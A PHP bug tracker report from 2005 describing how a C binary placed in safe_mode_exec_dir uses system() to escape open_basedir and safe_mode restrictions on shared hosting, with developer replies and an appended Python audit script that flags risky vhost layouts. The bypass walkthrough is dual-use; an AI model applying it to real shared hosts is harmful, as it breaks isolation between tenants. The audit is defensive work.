ID:               32421
Updated by:       [EMAIL PROTECTED]
Reported By:      ricardi at gmail dot com
Status:           Bogus
Bug Type:         Program Execution
Operating System: *nix (Tested on Linux)
PHP Version:      4.3.10
New Comment:

>The PHP engine can't control the children created by the
>exec functions?

exactly. and nobody can.


Previous Comments:
------------------------------------------------------------------------

[2005-03-23 16:38:58] ricardi at gmail dot com

The PHP engine can't control the children created by the exec functions?

This could be a great security enhancement, since some PHP applications are suffering from exploits that use this technique.

I've already disabled these functions now, but our clients are unhappy with these limitations.

------------------------------------------------------------------------

[2005-03-23 08:23:53] [EMAIL PROTECTED]

Disable system() and other exec functions then.
PHP is unable to prevent you from shooting your leg or formatting the hard drive with a binary called by a binary.

------------------------------------------------------------------------

[2005-03-23 01:10:23] ricardi at gmail dot com

Description:
------------
We bypass the safe_mode restrictions using a binary with the "system" function built in.

The problem occurred when we had an incident on a mass virtualhost machine. One of the domains executed a script that bypasses the safe_mode restrictions like open_basedir and safe_mode_exec_dir.

The configuration in the virtualhost was like:

<VirtualHost *>
    ServerName www.something.com
    ServerPath /mnt/nfs/domains/something.com.br/www
    php_admin_value open_basedir /mnt/nfs/domains/something.com.br/
    php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/
    php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/
    ...
</VirtualHost>

We created a simple program in "C" that creates a file outside the open_basedir and executes a binary that isn't in the safe_mode_exec_dir:

/* --------------- Contents of file.c ---------------- */
#include <stdio.h>
#include <stdlib.h>  /* declares system() */

int main()
{
    /* The shell started here is a child of this binary, not of PHP. */
    system("find / -maxdepth 1 > /tmp/trash.txt");
    return 0;
}

Compiling:

gcc -o file file.c

With FTP access, we put the file in the safe_mode_exec_dir:

> ls -la mnt/nfs/domains/something.com.br/
-rwxr-xr-x 1 nfsnobod nfsnobod 13576 Mar 22 16:57 file

Now create a PHP script that calls the binary.

<?php
system("file");
?>

Then put this in the webroot and, after accessing the script at http://www.something.com.br/script.php, check /tmp:

> ls -la /tmp
-rw-r--r-- 1 nfsnobody nfsnobody 139 Mar 22 21:00 trash.txt

We had to disable the execution feature from our product.

------------------------------------------------------------------------

--
Edit this bug report at http://bugs.php.net/?id=32421&edit=1
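
An added example, not part of the bug report or of PHP itself: the vhost in the report points safe_mode_exec_dir at the same tree the customer writes to over FTP, which is why an uploaded binary was allowed to run at all. This Python check flags vhosts with that overlap, assuming that everything under open_basedir or upload_tmp_dir is customer-writable; the sample configuration, host names and the /usr/local/php-safe-bin/ path are constructed.

```python
import posixpath
import re

# Constructed sample, modelled on the vhost layout in the report.
SAMPLE_CONF = """\
<VirtualHost *>
    ServerName www.example-a.test
    php_admin_value open_basedir /mnt/nfs/domains/example-a.test/
    php_admin_value upload_tmp_dir /mnt/nfs/domains/example-a.test/
    php_admin_value safe_mode_exec_dir /mnt/nfs/domains/example-a.test/
</VirtualHost>
<VirtualHost *>
    ServerName www.example-b.test
    php_admin_value open_basedir /mnt/nfs/domains/example-b.test/:/tmp/
    php_admin_value safe_mode_exec_dir /usr/local/php-safe-bin/
</VirtualHost>
"""

VHOST_RE = re.compile(r"<VirtualHost\b[^>]*>(.*?)</VirtualHost>", re.S | re.I)
VALUE_RE = re.compile(r"^\s*php_admin_value\s+(\S+)\s+(\S+)", re.M | re.I)
NAME_RE = re.compile(r"^\s*ServerName\s+(\S+)", re.M | re.I)


def _inside(path, root):
    """True if path equals root or lies below it (purely lexical check)."""
    path = posixpath.normpath(path)
    root = posixpath.normpath(root)
    return path == root or path.startswith(root.rstrip("/") + "/")


def audit_vhosts(conf_text):
    """Return [(server_name, exec_dir, overlapping_writable_dir), ...]."""
    findings = []
    for block in VHOST_RE.findall(conf_text):
        name_match = NAME_RE.search(block)
        name = name_match.group(1) if name_match else "<unnamed>"
        values = {k.lower(): v for k, v in VALUE_RE.findall(block)}
        exec_dir = values.get("safe_mode_exec_dir")
        if not exec_dir:
            continue
        # Assumption: open_basedir and upload_tmp_dir trees are customer-writable.
        writable = values.get("open_basedir", "").split(":")
        writable.append(values.get("upload_tmp_dir", ""))
        for root in filter(None, writable):
            if _inside(exec_dir, root):
                findings.append((name, exec_dir, root))
                break
    return findings
```

Calling audit_vhosts(SAMPLE_CONF) reports only the first vhost; the second keeps its exec directory outside anything the customer can upload to.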